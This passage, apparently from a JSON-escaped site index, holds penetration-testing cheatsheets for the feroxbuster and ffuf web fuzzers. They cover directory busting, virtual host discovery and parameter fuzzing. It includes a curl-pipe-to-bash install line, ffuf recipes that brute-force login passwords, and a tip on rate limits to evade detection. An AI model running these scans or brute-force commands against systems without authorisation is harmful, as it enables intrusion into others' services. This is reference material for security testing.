filtering\u003c/p\u003e\n\u003chr\u003e\n\u003ch2 id=\"installation\"\u003eInstallation\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003esudo apt install feroxbuster\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# or\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ecurl -sL https://raw.githubusercontent.com/epi052/feroxbuster/main/install-nix.sh | bash\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# or\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ecargo install 
feroxbuster\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"basic-usage\"\u003eBasic Usage\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eferoxbuster -u http://\u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eferoxbuster -u http://\u0026lt;ip\u0026gt; -w wordlist.txt\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"common-flags\"\u003eCommon Flags\u003c/h2\u003e\n\u003ctable\u003e\n\t\u003cthead\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003cth\u003eFlag\u003c/th\u003e\n\t\t\t\t\t\u003cth\u003eDescription\u003c/th\u003e\n\t\t\t\u003c/tr\u003e\n\t\u003c/thead\u003e\n\t\u003ctbody\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-u \u0026lt;url\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eTarget URL\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-w \u0026lt;wordlist\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eWordlist (default: built-in if not specified)\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-t \u0026lt;n\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eThreads (default: 50)\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-x \u0026lt;ext\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eFile extensions to append\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-d 
\u0026lt;n\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eRecursion depth (default: 4, 0 = unlimited)\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-r\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eFollow redirects\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-k\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eDisable TLS certificate verification\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-n\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eDisable recursion\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-C \u0026lt;codes\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eFilter out status codes\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-s \u0026lt;codes\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eOnly show these status codes\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-S \u0026lt;size\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eFilter by response size (bytes)\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-W \u0026lt;words\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eFilter by word count in response\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-L \u0026lt;lines\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eFilter by line count in response\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-X \u0026lt;regex\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eFilter by response body 
regex\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-H \u0026lt;header\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eAdd custom header (repeatable)\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-b \u0026lt;cookie\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eAdd cookie\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-m \u0026lt;methods\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eHTTP methods (default: GET)\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-o \u0026lt;file\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eOutput to file\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-q\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eQuiet — no banner or progress\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e--json\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eOutput as JSON\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-v\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eVerbose\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-T \u0026lt;seconds\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eRequest timeout\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e--rate-limit \u0026lt;n\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eMax requests per second\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-p \u0026lt;proxy\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eUse proxy 
(http/socks5)\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-U \u0026lt;user\u0026gt; -P \u0026lt;pass\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eHTTP Basic auth\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-a \u0026lt;agent\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eUser-Agent string\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e--dont-filter\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eDisable wildcard filtering\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e--auto-tune\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eAutomatically slow down on errors\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e--collect-extensions\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eCollect and scan discovered extensions\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e--collect-words\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eBuild wordlist from responses\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e--resume-from \u0026lt;file\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eResume from a saved state file\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\u003c/tbody\u003e\n\u003c/table\u003e\n\u003chr\u003e\n\u003ch2 id=\"common-commands\"\u003eCommon Commands\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan 
style=\"color:#75715e\"\u003e# Basic scan with extensions\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eferoxbuster -u http://\u0026lt;ip\u0026gt; -w wordlist.txt -x php,html,txt\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# No recursion (flat scan)\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eferoxbuster -u http://\u0026lt;ip\u0026gt; -w wordlist.txt -n\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Limit recursion depth\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eferoxbuster -u http://\u0026lt;ip\u0026gt; -w wordlist.txt -d \u003cspan style=\"color:#ae81ff\"\u003e2\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Filter out 404s and 403s\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eferoxbuster -u http://\u0026lt;ip\u0026gt; -w wordlist.txt -C 404,403\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Only show 200 and 301\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eferoxbuster -u http://\u0026lt;ip\u0026gt; -w wordlist.txt -s 
200,301\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Filter responses by size (remove default page noise)\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eferoxbuster -u http://\u0026lt;ip\u0026gt; -w wordlist.txt -S \u003cspan style=\"color:#ae81ff\"\u003e1234\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Filter by word count\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eferoxbuster -u http://\u0026lt;ip\u0026gt; -w wordlist.txt -W \u003cspan style=\"color:#ae81ff\"\u003e25\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# HTTPS with TLS skip\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eferoxbuster -u https://\u0026lt;ip\u0026gt; -w wordlist.txt -k\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Custom headers (e.g. 
API auth)\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eferoxbuster -u http://\u0026lt;ip\u0026gt; -w wordlist.txt \u003cspan style=\"color:#ae81ff\"\u003e\\\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e  -H \u003cspan style=\"color:#e6db74\"\u003e\u0026#34;Authorization: Bearer \u0026lt;token\u0026gt;\u0026#34;\u003c/span\u003e \u003cspan style=\"color:#ae81ff\"\u003e\\\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e  -H \u003cspan style=\"color:#e6db74\"\u003e\u0026#34;X-Custom: value\u0026#34;\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Use proxy (Burp Suite)\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eferoxbuster -u http://\u0026lt;ip\u0026gt; -w wordlist.txt \u003cspan style=\"color:#ae81ff\"\u003e\\\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e  -p http://127.0.0.1:8080 -k\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# POST requests\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eferoxbuster -u http://\u0026lt;ip\u0026gt; -w wordlist.txt -m POST\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Multiple HTTP 
methods\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eferoxbuster -u http://\u0026lt;ip\u0026gt; -w wordlist.txt -m GET,POST,PUT\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Output to file (also saves state for resume)\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eferoxbuster -u http://\u0026lt;ip\u0026gt; -w wordlist.txt -o results.txt\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# JSON output\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eferoxbuster -u http://\u0026lt;ip\u0026gt; -w wordlist.txt --json -o results.json\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Resume interrupted scan\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eferoxbuster --resume-from ferox-\u0026lt;ip\u0026gt;.state\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Rate limit (be polite / evade detection)\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eferoxbuster -u http://\u0026lt;ip\u0026gt; -w wordlist.txt --rate-limit \u003cspan 
style=\"color:#ae81ff\"\u003e100\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Collect extensions seen in responses and scan them too\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eferoxbuster -u http://\u0026lt;ip\u0026gt; -w wordlist.txt --collect-extensions\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Build a wordlist from page content, then use it\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eferoxbuster -u http://\u0026lt;ip\u0026gt; -w wordlist.txt --collect-words\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"virtual-host-discovery\"\u003eVirtual Host Discovery\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# feroxbuster doesn\u0026#39;t natively fuzz Host headers\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Use with -H to manually set a specific host header,\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# or use ffuf/gobuster for vhost 
fuzzing\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eferoxbuster -u http://\u0026lt;ip\u0026gt; -w wordlist.txt \u003cspan style=\"color:#ae81ff\"\u003e\\\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e  -H \u003cspan style=\"color:#e6db74\"\u003e\u0026#34;Host: staging.example.com\u0026#34;\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"interactive-pause-menu\"\u003eInteractive Pause Menu\u003c/h2\u003e\n\u003cp\u003eWhile feroxbuster is running, press \u003ccode\u003eENTER\u003c/code\u003e to open the interactive menu:\u003c/p\u003e","title":"feroxbuster"},{"content":"ffuf Cheatsheet Type: Fast web fuzzer — directory busting, virtual host discovery, parameter fuzzing, Host header fuzzing\nInstallation sudo apt install ffuf # or go install github.com/ffuf/ffuf/v2@latest Core Concept FUZZ is the keyword replaced by each wordlist entry. It can go anywhere in the request — URL path, headers, parameters, body.\nffuf -u http://\u0026lt;ip\u0026gt;/FUZZ -w wordlist.txt Multiple keywords are supported by naming them with -w wordlist:KEYWORD:\nffuf -u http://\u0026lt;ip\u0026gt;/FUZZ -w wordlist1.txt -w params.txt:PARAM Common Flags Flag Description -u \u0026lt;url\u0026gt; Target URL (include FUZZ) -w \u0026lt;wordlist\u0026gt; Wordlist (use wordlist:KEYWORD for named) -H \u0026lt;header\u0026gt; Add/fuzz header (repeatable) -X \u0026lt;method\u0026gt; HTTP method (default: GET) -d \u0026lt;data\u0026gt; POST data body -b \u0026lt;cookie\u0026gt; Cookie string -r Follow redirects -k Skip TLS verification -t \u0026lt;n\u0026gt; Threads (default: 40) -p \u0026lt;delay\u0026gt; Delay between requests (e.g. 
0.1, 0.5-1.5) -rate \u0026lt;n\u0026gt; Max requests per second -timeout \u0026lt;n\u0026gt; Request timeout in seconds -mc \u0026lt;codes\u0026gt; Match status codes (default: 200-299,301,302,307,401,403,405,500) -ms \u0026lt;size\u0026gt; Match response size -mw \u0026lt;words\u0026gt; Match word count -ml \u0026lt;lines\u0026gt; Match line count -mr \u0026lt;regex\u0026gt; Match regex in response body -fc \u0026lt;codes\u0026gt; Filter status codes -fs \u0026lt;size\u0026gt; Filter response size -fw \u0026lt;words\u0026gt; Filter word count -fl \u0026lt;lines\u0026gt; Filter line count -fr \u0026lt;regex\u0026gt; Filter regex in response body -ac Auto-calibrate filters (detects and removes false positives) -o \u0026lt;file\u0026gt; Output file -of \u0026lt;fmt\u0026gt; Output format: json, ejson, html, md, csv, all -v Verbose (show redirects, full URL) -s Silent — only results -c Colorize output -recursion Enable recursive fuzzing -recursion-depth \u0026lt;n\u0026gt; Recursion depth -e \u0026lt;exts\u0026gt; File extensions (e.g. 
php,html,txt) -ic Ignore wordlist comments -input-cmd \u0026lt;cmd\u0026gt; Use command output as input instead of wordlist Directory \u0026amp; File Fuzzing # Basic directory scan ffuf -u http://\u0026lt;ip\u0026gt;/FUZZ -w wordlist.txt # With file extensions ffuf -u http://\u0026lt;ip\u0026gt;/FUZZ -w wordlist.txt -e .php,.html,.txt,.bak # Filter 404s ffuf -u http://\u0026lt;ip\u0026gt;/FUZZ -w wordlist.txt -fc 404 # Match only 200 ffuf -u http://\u0026lt;ip\u0026gt;/FUZZ -w wordlist.txt -mc 200 # Auto-calibrate (removes false positives automatically) ffuf -u http://\u0026lt;ip\u0026gt;/FUZZ -w wordlist.txt -ac # Recursive scanning ffuf -u http://\u0026lt;ip\u0026gt;/FUZZ -w wordlist.txt -recursion -recursion-depth 3 -e .php # Filter by response size (remove noise) ffuf -u http://\u0026lt;ip\u0026gt;/FUZZ -w wordlist.txt -fs 4242 Virtual Host Discovery (Host Header Fuzzing) # Basic vhost fuzzing ffuf -u http://\u0026lt;ip\u0026gt; -H \u0026#34;Host: FUZZ.example.com\u0026#34; -w wordlist.txt # Filter default response size ffuf -u http://\u0026lt;ip\u0026gt; -H \u0026#34;Host: FUZZ.example.com\u0026#34; \\ -w wordlist.txt \\ -fs \u0026lt;default_size\u0026gt; # Auto-calibrate to remove default response ffuf -u http://\u0026lt;ip\u0026gt; -H \u0026#34;Host: FUZZ.example.com\u0026#34; \\ -w wordlist.txt \\ -ac # HTTPS ffuf -u https://\u0026lt;ip\u0026gt; -H \u0026#34;Host: FUZZ.example.com\u0026#34; \\ -w wordlist.txt \\ -k -fs \u0026lt;default_size\u0026gt; Parameter Fuzzing # GET parameter discovery ffuf -u \u0026#34;http://\u0026lt;ip\u0026gt;/page?FUZZ=value\u0026#34; -w wordlist.txt -fc 404 # GET parameter value fuzzing ffuf -u \u0026#34;http://\u0026lt;ip\u0026gt;/page?id=FUZZ\u0026#34; -w numbers.txt # POST parameter fuzzing ffuf -u http://\u0026lt;ip\u0026gt;/login \\ -X POST \\ -d \u0026#34;username=admin\u0026amp;password=FUZZ\u0026#34; \\ -w wordlist.txt \\ -fc 401 # POST body with JSON ffuf -u http://\u0026lt;ip\u0026gt;/api/login \\ -X POST \\ -H 
\u0026#34;Content-Type: application/json\u0026#34; \\ -d \u0026#39;{\u0026#34;username\u0026#34;:\u0026#34;admin\u0026#34;,\u0026#34;password\u0026#34;:\u0026#34;FUZZ\u0026#34;}\u0026#39; \\ -w wordlist.txt Multiple Wordlists (Clusterbomb / Pitchfork) # Two keywords — try all combinations (clusterbomb) ffuf -u http://\u0026lt;ip\u0026gt;/FUZZ/W2 \\ -w wordlist.txt:FUZZ \\ -w extensions.txt:W2 # Username + password combinations ffuf -u http://\u0026lt;ip\u0026gt;/login \\ -X POST \\ -d \u0026#34;user=USER\u0026amp;pass=PASS\u0026#34; \\ -w users.txt:USER \\ -w passwords.txt:PASS \\ -fc 401 Fuzzing with Proxy (Burp Suite) ffuf -u http://\u0026lt;ip\u0026gt;/FUZZ -w wordlist.txt \\ -x http://127.0.0.1:8080 -k Output # Save to file (markdown) ffuf -u http://\u0026lt;ip\u0026gt;/FUZZ -w wordlist.txt -o results.md -of md # Save as JSON ffuf -u http://\u0026lt;ip\u0026gt;/FUZZ -w wordlist.txt -o results.json -of json # Save all formats ffuf -u http://\u0026lt;ip\u0026gt;/FUZZ -w wordlist.txt -o results -of all Recommended Wordlists # Directories /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt /usr/share/seclists/Discovery/Web-Content/common.txt # Virtual hosts / subdomains /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt # Parameters /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt # Passwords /usr/share/seclists/Passwords/xato-net-10-million-passwords-10000.txt Example Full Runs # Directory + extension scan ffuf -u http://example.com/FUZZ \\ -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt \\ -e .php,.html,.txt,.bak \\ -ac -c -v \\ -t 50 \\ -o ffuf_dir.json -of json # Virtual host discovery ffuf -u http://example.com \\ -H \u0026#34;Host: FUZZ.example.com\u0026#34; \\ -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt \\ -ac -c \\ -t 50 
